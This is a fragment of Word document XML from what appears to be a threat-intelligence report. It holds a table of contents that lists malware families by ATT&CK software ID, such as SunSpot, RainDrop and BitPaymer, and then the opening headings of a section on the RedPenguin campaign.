          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50F8DBB6" w14:textId="27DF7E4B" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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7611A7C3" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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E5DCB18" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="16"/>
                </w:rPr>
                <w:t>S0562</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> - SunSpot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F4516E3" w14:textId="1D272410" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00B701FC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="6C48D839" w14:textId="77777777" w:rsidTr="00B32006">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5384C813" w14:textId="07F19BDA" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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27FC6336" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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876CE16" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="16"/>
                </w:rPr>
                <w:t>S0564</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> - BlackMould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0CCCFB3" w14:textId="1EF1BCC1" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00B701FC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="4F5F9525" w14:textId="77777777" w:rsidTr="00B32006">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419BE683" w14:textId="694FB1B5" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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14E70755" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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111640" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="16"/>
                </w:rPr>
                <w:t>S0565</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> - RainDrop</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08F954D" w14:textId="364E1CBD" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00B701FC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="41687AB1" w14:textId="77777777" w:rsidTr="00B32006">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20E9951E" w14:textId="0594E5D2" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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C0A7039" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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8009C1" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="16"/>
                </w:rPr>
                <w:t>S0567</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Dtrack</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6032328" w14:textId="539F0C12" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00970745" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="37C451C7" w14:textId="77777777" w:rsidTr="00B32006">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6037A4E0" w14:textId="1BAD007B" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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51BD17A4" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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40C87E" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="16"/>
                </w:rPr>
                <w:t>S0568</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> - EvilNum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6586269" w14:textId="42FD8463" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00970745" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="45A88ACC" w14:textId="77777777" w:rsidTr="00B32006">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01820E0C" w14:textId="2AACD359" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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75619229" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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312AC1" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="16"/>
                </w:rPr>
                <w:t>S0569</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Explosive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841F6DE" w14:textId="00261249" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00970745" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="7404EBDB" w14:textId="77777777" w:rsidTr="00B32006">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE1A061" w14:textId="71BB6E79" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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3D29524" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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B028C5" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="16"/>
                </w:rPr>
                <w:t>S0570</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> - BitPaymer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118EB3A" w14:textId="32287C35" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00970745" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>27 - 28</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BD0931A" w14:textId="1CB5AD7A" w:rsidR="0084001D" w:rsidRPr="003168F2" w:rsidRDefault="0084001D" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D492E12" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B92B011" w14:textId="237A7E3A" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Campaign Research — C0056 RedPenguin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B01F8F" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69BCBEF9" w14:textId="459008D8" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="00AD249E" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18EE2B81" wp14:editId="3AEE1762">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1814170</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-40107</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048000" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="1536214916" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3048000" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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BDD7C23" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:142.85pt;margin-top:-3.15pt;width:240pt;height:33.75pt;z-index:251674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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006537E8" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Campaign Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB73E4C" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="006537E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
